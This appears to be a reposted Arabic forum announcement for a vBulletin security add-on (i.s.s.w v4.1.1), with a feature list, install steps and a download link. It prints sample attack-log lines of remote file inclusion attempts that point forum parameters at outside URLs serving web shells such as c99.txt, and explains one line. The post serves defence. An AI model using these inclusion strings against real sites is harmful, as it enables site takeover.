السلام عليكم ورحمة الله وبركاته
نظرا لكثرة الاختراقات وعبس اطفالنا الصغار بمواقعنا
وبهدمون تعبنا ويقلون راحتنا :crazy:
اليكم اليوم اخر اصدار من هاك الحمايه الكامل والكمال لله وحده من الفريق الامنى i.s.s.w
================================================== =====
وداعـــا Spacer_Close مع هذا الهاك المميز
اسم المنتج : حماية المنتدي i.s.s.w
الإصدار : i.s.s.w v 4.1.1
المبرمجين : الفريق الامني M.M.A i.s.s.w
جديد الاصدار :
1:قراءة ملف اللوق لمحاولات الاختراق من لوحت التحكم
2: امكانية التحكم في الصفحة التي تعرض للمخترق
3: اضافه لوحت تحكم مختصره cp vb
4: اضافة اخبار عن ثغرات المنتديات في لوحت التحكم كأختصار
5 : تنبية في التحديث
6: تعديلات في عمل الهاك وتحديثة
7: حماية ملف config.php مع امكانيه اضافه حمايتة مهما تغير المسمى جديد
8: اغلاق ثغره Spacer_Open و Spacer_Close من غير تعديل قوالب جديد
الخيار الاول :
لتشغيل حمايه المنتدي
منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح
منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%
حجب عدة مواقع تساعد على العبث في المنتديات
تطوير للدوال القديمة للتوافق معه السيرفر
منع اكثر اوامر اليونكس وحيل الحقن في الشيل
اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك
الخيار الثاني :
منع اكواد التحويل لاخر عشر مواضيع
والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع
الان نأتي للقسم الاكثر اثارة للموضوع
عند دخولك مجلد sec
افتح الملف logfile_hacker.txt
ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل
رمز PHP:
2007-12-11, 05:50:44, 1197370244, 209.67.223.188, p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?, libwww-perl/5.808
2007-12-11, 06:32:22, 1197372742, 203.211.135.147, t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808
2007-12-11, 07:09:46, 1197374986, 211.157.108.187, p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79
2007-12-11, 09:15:08, 1197382508, 200.102.138.66, t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library)
الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر
طبعا الفاصلة تفصل بين كل معلومه ومعلومة
رمز PHP:
,
التاريخ والوقت
رمز PHP:
2007-12-11, 05:50:44,
عدد المحاولات
رمز PHP:
1197370244
ايبي الموقع المصااب
رمز PHP:
209.67.223.188
الاصابة طبعا تشفرت لاغراض امنيه
رمز PHP:
p=11575//codebb/lang_select
الاستغلال
رمز PHP:
?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?
نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج
يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه
رمز PHP:
libwww-perl/5.808
طريقة التركيب ::
امسح جميع هاكات لها علاقه في الحمايه او منع xss
اما من ركب هاك الحمايه issw v4.0 issw v3
عليه فقط حذف ملف البرودكت
وتركيب المحدث
---------------------------------------------------------------------------
نرفع ما بداخل
upload
ارفع المجلد sec
الى مجلد المنتدي الرئيسي
اعطي التصريح 666
اقتباس:
counter.txt
logfile_hacker.txt
وارفع cpnav_issw
داخل
vb\includes\xml
قوم باستدعاء البروديكت من لوحت تحكم المنتدي
تحميل الهاك
اضغــط هنا للتحمــيل
او فى المرفقات :bleh:
معلومات زيادة :bigsmile:
تم اصلاح مشكله الفوتر
تم ترقيه عدت دوال جديده مستخدمه للهكر لعرض config
تم عمل نظام التحديث والتنزيل من لوحت تحكم المنتدي
طرق الترقيه فقط ارفع ملف البرودكت مع السماح لخيار الكتابه في الاختيار نعم
رابط الموضوع الاصلى
http://www.is-sw.net/vb/showthread.php?t=4329
الموضوع منقول بحذافيرة من الفريق الامنى i.s.s.w
منـ ق ـول لافادتكم فقط وطبعا كل الحقوق محفوظه للفريق الامنى i.s.s.w
وبالتوفيق للجميع :icon31: